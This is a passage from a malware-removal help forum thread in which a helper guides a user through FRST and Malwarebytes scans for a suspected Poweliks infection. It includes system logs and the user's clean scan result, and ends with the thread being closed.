FirewallRules: [{0BD45850-ADD6-4FB8-9763-A7803A529714}] => (Allow) LPort=2869

FirewallRules: [{3E5C0A9A-8603-4FD0-9015-B81E4B910642}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe

FirewallRules: [{3C2C253A-75CC-4267-90E2-CFA17D99C597}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe

FirewallRules: [{80D6559F-AA11-4937-9A76-F8F47B0FA5A9}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe

FirewallRules: [{63D829A9-1866-46EE-BE65-46FFC2EF34C7}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe

FirewallRules: [{37F2FF54-CA8C-421C-A6D7-C3E7998F3851}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe

FirewallRules: [{035BCD7C-7394-4029-A70D-306939C141B5}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe

FirewallRules: [{7DE873A1-B04A-4DC4-BF07-72452AA6769A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe

FirewallRules: [{EB8518E6-0C53-4592-A329-17FF4E03C814}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe

FirewallRules: [{C4117717-1BF8-4083-B45B-8E65BE340653}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe

FirewallRules: [{A009DA25-1808-4BF7-8594-F809220AD544}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe

FirewallRules: [{DA464FB2-57C0-4998-85E8-54A7D16F808D}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\bin\FaxApplications.exe

FirewallRules: [{31F26292-472F-4FFC-AA3A-0278395E83A7}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\bin\DigitalWizards.exe

FirewallRules: [{9BF7603D-8F7C-4E49-ABCC-C7311B6E0DA8}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\bin\SendAFax.exe

FirewallRules: [{6026A0A4-DCD7-419C-8407-81503532C00B}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\Bin\DeviceSetup.exe

FirewallRules: [{A783AA3C-A803-45F8-9270-860CE2C449BC}] => (Allow) LPort=5357

FirewallRules: [{69728B7B-B5FA-48E5-A57A-8AC7AD8CFD35}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\Bin\HPNetworkCommunicatorCom.exe

FirewallRules: [{94C72F18-5920-4207-99C7-3139704D79E1}] => (Allow) LPort=50000

FirewallRules: [{BC519CD9-D5BF-4289-AB5D-F134CBA183D7}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe

FirewallRules: [{2646CD7C-C5DA-4EDC-8811-98E05D23D1AF}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe

FirewallRules: [{761227BA-3A0B-4783-9D92-5A778653F022}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

FirewallRules: [{A5A81B4C-BC6A-4AB7-8DF4-428AB39C529D}] => (Allow) C:\Program Files (x86)\Google\Chrome Remote Desktop\52.0.2743.48\remoting_host.exe

FirewallRules: [TCP Query User{0E400244-55F2-4995-BDAF-BE37DE126EA3}C:\users\kyle aniel\downloads\airmouse.exe] => (Block) C:\users\kyle aniel\downloads\airmouse.exe

FirewallRules: [UDP Query User{8C40C563-77CF-4CD6-B606-00A658B175BC}C:\users\kyle aniel\downloads\airmouse.exe] => (Block) C:\users\kyle aniel\downloads\airmouse.exe

FirewallRules: [TCP Query User{AF159B5F-F569-4FC3-A426-0F45CF62F1A6}C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe] => (Block) C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe

FirewallRules: [UDP Query User{DFC2E528-A381-4BB4-A766-40F096B52695}C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe] => (Block) C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe

FirewallRules: [TCP Query User{B075427D-FA99-437A-9826-8B8E82766740}C:\users\kyle aniel\downloads\airmouse.exe] => (Block) C:\users\kyle aniel\downloads\airmouse.exe

FirewallRules: [UDP Query User{FCC68B87-C0F9-4AAF-9801-459975C199C8}C:\users\kyle aniel\downloads\airmouse.exe] => (Block) C:\users\kyle aniel\downloads\airmouse.exe

FirewallRules: [TCP Query User{B6438A5A-55C1-49AF-8357-63FE07103FF9}C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe] => (Block) C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe

FirewallRules: [UDP Query User{BECDF835-CCAA-4B58-8415-09AAFE18C14E}C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe] => (Block) C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe

FirewallRules: [{81BF7A2B-4DAC-49CF-AD5D-A6AEB59C2CF4}] => (Allow) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRManager.exe

 

==================== Restore Points =========================

 

17-10-2016 15:19:58 Windows Update

 

==================== Faulty Device Manager Devices =============

 

 

==================== Event log errors: =========================

 

Application errors:

==================

Error: (10/20/2016 03:04:30 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415

Faulting module name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415

Exception code: 0xc0000005

Fault offset: 0x000000000018c781

Faulting process id: 0x970

Faulting application start time: 0x01d22acb7f9951ec

Faulting application path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe

Faulting module path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe

Report Id: 9eef0189-127d-4119-9c79-773febf82963

Faulting package full name:

Faulting package-relative application ID:

 

Error: (10/19/2016 05:33:22 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: HPWMISVC.exe, version: 1.4.1.0, time stamp: 0x55910776

Faulting module name: OLEAUT32.dll, version: 10.0.14393.187, time stamp: 0x57cf9bf4

Exception code: 0xc0000005

Fault offset: 0x0001bf74

Faulting process id: 0xb28

Faulting application start time: 0x01d22a692db8f901

Faulting application path: C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe

Faulting module path: C:\WINDOWS\System32\OLEAUT32.dll

Report Id: a0b2c54f-2d93-4465-b735-0b96d385903d

Faulting package full name:

Faulting package-relative application ID:

 

Error: (10/19/2016 04:53:47 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415

Faulting module name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415

Exception code: 0xc0000005

Fault offset: 0x000000000018c781

Faulting process id: 0x58a8

Faulting application start time: 0x01d22a629b5fb541

Faulting application path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe

Faulting module path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe

Report Id: 38c9a44e-c636-4c63-8c93-8a2cad2d4939

Faulting package full name:

Faulting package-relative application ID:

 

Error: (10/19/2016 04:53:44 PM) (Source: Application Error) (EventID: 1005) (User: )

Description: Windows cannot access the file  for one of the following reasons:

there is a problem with the network connection, the disk that the file is stored on, or the storage

drivers installed on this computer; or the disk is missing.

Windows closed the program gramblr.exe because of this error.

 

Program: gramblr.exe

File:

 

The error value is listed in the Additional Data section.

User Action

1. Open the file again.

This situation might be a temporary problem that corrects itself when the program runs again.

2.

If the file still cannot be accessed and

      - It is on the network,

your network administrator should verify that there is not a problem with the network and that the server can be contacted.

      - It is on a removable disk, for example, a floppy disk or CD-ROM, verify that the disk is fully inserted into the computer.

3. Check and repair the file system by running CHKDSK. To run CHKDSK, click Start, click Run, type CMD, and then click OK. At the command prompt, type CHKDSK /F, and then press ENTER.

4. If the problem persists, restore the file from a backup copy.

5. Determine whether other files on the same disk can be opened. If not, the disk might be damaged. If it is a hard disk, contact your administrator or computer hardware vendor for

further assistance.

 

Additional Data

Error value: 00000000

Disk type: 0

 

Error: (10/19/2016 04:53:44 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: gramblr.exe, version: 0.0.0.0, time stamp: 0x57fef5a9

Faulting module name: gramblr.exe, version: 0.0.0.0, time stamp: 0x57fef5a9

Exception code: 0xc0000096

Fault offset: 0x0000000000517889

Faulting process id: 0x3838

Faulting application start time: 0x01d22a63a08525c6

Faulting application path: C:\Program Files\Gramblr\gramblr.exe

Faulting module path: C:\Program Files\Gramblr\gramblr.exe

Report Id: 797dd3f7-6cf2-4fcb-9a98-29a11d223659

Faulting package full name:

Faulting package-relative application ID:

 

Error: (10/19/2016 04:50:43 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: gramblr.exe, version: 0.0.0.0, time stamp: 0x57fef5a9

Faulting module name: ntdll.dll, version: 10.0.14393.206, time stamp: 0x57dac931

Exception code: 0xc0000005

Fault offset: 0x00000000000485a6

Faulting process id: 0x4558

Faulting application start time: 0x01d22a5ae1da18ae

Faulting application path: C:\Program Files\Gramblr\gramblr.exe

Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll

Report Id: 4c1ae0f6-970a-4bb5-a664-e67a352c0c73

Faulting package full name:

Faulting package-relative application ID:

 

Error: (10/19/2016 04:46:35 PM) (Source: Perflib) (EventID: 1008) (User: )

Description: The Open Procedure for service "aspnet_state" in DLL "C:\Windows\System32\aspnet_counters.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.

 

Error: (10/19/2016 04:46:35 PM) (Source: Perflib) (EventID: 1008) (User: )

Description: The Open Procedure for service "ASP.NET_4.0.30319" in DLL "C:\Windows\System32\aspnet_counters.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.

 

Error: (10/19/2016 04:46:35 PM) (Source: Perflib) (EventID: 1008) (User: )

Description: The Open Procedure for service "ASP.NET" in DLL "C:\Windows\System32\aspnet_counters.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.

 

Error: (10/19/2016 04:41:48 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415

Faulting module name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415

Exception code: 0xc0000005

Fault offset: 0x000000000018c781

Faulting process id: 0x5a5c

Faulting application start time: 0x01d22a5e6a333d87

Faulting application path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe

Faulting module path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe

Report Id: b2dce35a-28af-4010-97b7-5b8bb880b488

Faulting package full name:

Faulting package-relative application ID:

 

 

System errors:

=============

Error: (10/20/2016 03:04:32 PM) (Source: Service Control Manager) (EventID: 7034) (User: )

Description: The McAfee Internet Content Filter Core Service service terminated unexpectedly.  It has done this 1 time(s).

 

Error: (10/20/2016 03:03:17 PM) (Source: Service Control Manager) (EventID: 7031) (User: )

Description: The Windows Connectivity Manager for Gramblr service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 500 milliseconds: Restart the service.

 

Error: (10/20/2016 03:03:17 PM) (Source: Service Control Manager) (EventID: 7023) (User: )

Description: The Windows Connectivity Manager for Gramblr service terminated with the following error:

Incorrect function.

 

Error: (10/20/2016 06:14:23 AM) (Source: Service Control Manager) (EventID: 7023) (User: )

Description: The Interactive Services Detection service terminated with the following error:

Incorrect function.

 

Error: (10/20/2016 05:17:56 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)

Description: The server {784E29F4-5EBE-4279-9948-1E8FE941646D} did not register with DCOM within the required timeout.

 

Error: (10/20/2016 05:15:00 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)

Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID

{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}

 and APPID

{F72671A9-012C-4725-9D2F-2A4D32D65169}

 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

 

Error: (10/20/2016 05:14:03 AM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: The vcs service failed to start due to the following error:

Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

Error: (10/20/2016 05:14:00 AM) (Source: EventLog) (EventID: 6008) (User: )

Description: The previous system shutdown at 8:02:10 PM on 10/19/2016 was unexpected.

 

Error: (10/19/2016 05:34:25 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)

Description: The server {784E29F4-5EBE-4279-9948-1E8FE941646D} did not register with DCOM within the required timeout.

 

Error: (10/19/2016 05:33:26 PM) (Source: Service Control Manager) (EventID: 7034) (User: )

Description: The HPWMISVC service terminated unexpectedly.  It has done this 1 time(s).

 

 

CodeIntegrity:

===================================

  Date: 2016-10-20 05:14:03.848

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2016-10-19 17:30:37.818

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2016-10-19 14:36:00.227

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2016-10-18 23:53:53.561

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2016-10-18 20:48:33.285

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2016-10-18 19:51:48.344

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2016-10-18 14:27:52.440

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2016-10-18 13:52:28.063

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2016-10-18 13:34:12.922

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2016-10-17 14:58:52.353

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

 

==================== Memory info ===========================

 

Processor: Intel(R) Core(TM) i5-4210U CPU @ 1.70GHz

Percentage of memory in use: 46%

Total physical RAM: 8122.15 MB

Available physical RAM: 4312.15 MB

Total Virtual: 9402.15 MB

Available Virtual: 5549.66 MB

 

==================== Drives ================================

 

Drive c: (Windows) (Fixed) (Total:907.42 GB) (Free:485.65 GB) NTFS

Drive d: (RECOVERY) (Fixed) (Total:22.23 GB) (Free:2.5 GB) NTFS ==>[system with boot components (obtained from drive)]

 

==================== MBR & Partition Table ==================

 

========================================================

Disk: 0 (Size: 931.5 GB) (Disk ID: DB0E6155)

 

Partition: GPT.

 

==================== End of Addition.txt ============================

Link to post
Share on other sites

Thank you for the logs, much better that way :) For the next FRST logs, you can attach them instead.

We'll run a first fix with FRST, followed by a scan with Malwarebytes to see if FRST really did remove the infection.

iO3R662.pngFarbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.

  • Download the attached fixlist.txt file, and save it on your Desktop (or wherever your FRST.exe/FRST64.exe executable is located);
  • Right-click on the FRST executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Click on the Fix button;
    NYA5Cbr.png
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad;
  • Copy and paste its content in your next reply;

0isDeWa.pngMalwarebytes Anti-Malware - Clean Mode

  • Download and install the free version of Malwarebytes Anti-Malware
    Note: It's your choice if you want to enable the free trial of Malwarebytes Premium or not. Enabling it will give you real-time protection from the program, as well as access to all the Premium features.
    Note: If you have Malwarebytes already installed, you don't need to install it again. Simply start from the next bullet point;
  • Once Malwarebytes is installed, launch it and let it update his database. You might have to click on the Update Now button;
  • Once the database update is complete, click on the Scan tab, then select the Threat Scan button and click on Start Scan;
  • Let the scan run, the time required to complete the scan depends of your system and computer specs;
  • Once the scan is complete, make sure that the checkbox by Threat is checked (it means that every item detected is checked), then click on the Remove Selected button;
  • Click on Save Results after the deletion (in the bottom-right corner) and select Copy to clipboard. Paste the content in your next reply;

After running the FRST fix and Malwarebytes, does McAfee still gives you warnings about Poweliks?

Your next reply(ies) should include:

  • Copy/pasted content of FRST's fixlog.txt;
  • Copy/pasted content of Malwarebytes' clean log;
  • Answer to my question about McAfee and Poweliks warnings;

fixlist.txt

Link to post
Share on other sites

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 10/21/2016
Scan Time: 5:32 AM
Logfile: 
Administrator: No

Version: 2.2.1.1043
Malware Database: v2016.10.21.07
Rootkit Database: v2016.09.26.02
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: Kyle Aniel

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 312180
Time Elapsed: 20 min, 1 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)

 

 

 

 

 

Does this mean Poweliks is gone?

Link to post
Share on other sites

Are you still getting warnings from Avira about Poweliks? 

We'll grab a fresh set of FRST logs to see it's really gone or not.

iO3R662.pngFarbar Recovery Scan Tool (FRST) - Scan mode
Follow the instructions below to download and execute a scan on your system with FRST, and provide the logs in your next reply.

  • Right-click on the executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Accept the disclaimer by clicking on Yes, and FRST will then do a back-up of your Registry which should take a few seconds;
  • Click on the Scan button;
  • On completion, two message box will open, saying that the results were saved to FRST.txt and Addition.txt, then open two Notepad files;
  • Copy and paste the content of both FRST.txt and Addition.txt in your next reply;

Your next reply(ies) should include:

  • Answer to my question about Avira;
  • Copy/pasted content of FRST.txt;
  • Copy/pasted content of Addition.txt;

 

Link to post
Share on other sites

  • Root Admin

Due to the lack of feedback this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.Other members who need assistance please start your own topic in a new thread. Thanks!

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.